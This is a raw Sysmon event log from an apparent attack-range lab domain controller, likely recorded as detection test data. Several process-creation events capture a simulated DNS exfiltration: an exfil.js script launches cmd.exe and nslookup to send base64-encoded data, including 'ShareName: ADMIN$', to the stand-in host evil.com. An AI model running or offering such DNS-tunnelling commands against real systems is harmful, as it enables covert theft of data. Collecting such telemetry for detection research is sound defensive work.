14:21:24.348{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8D42-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-18E4-629A-8B42-000000005F02}46247212C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-8D42-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.358{2E1864BB-18E4-629A-8D42-000000005F02}1736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-8B42-000000005F02}4624C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjxaw.tmp 2>&1 10341000x8000000000000000206300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.333{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8C42-000000005F02}7660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.333{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8C42-000000005F02}7660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.333{2E1864BB-18E4-629A-8C42-000000005F02}76606448C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8B42-000000005F02}4624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8C42-000000005F02}7660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8B42-000000005F02}4624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.317{2E1864BB-18E0-629A-6742-000000005F02}39767352C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-8B42-000000005F02}4624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.319{2E1864BB-18E4-629A-8B42-000000005F02}4624C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjxaw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.301{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlosnnifk.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.286{2E1864BB-18E4-629A-8942-000000005F02}10087408C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8A42-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8A42-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.270{2E1864BB-18E4-629A-8842-000000005F02}45722944C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-8A42-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.283{2E1864BB-18E4-629A-8A42-000000005F02}7712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-8842-000000005F02}4572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlosnnifk.tmp 2>&1 10341000x8000000000000000206280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.265{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8942-000000005F02}1008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.264{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8942-000000005F02}1008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.248{2E1864BB-18E4-629A-8942-000000005F02}10087408C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8842-000000005F02}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.248{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8942-000000005F02}1008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 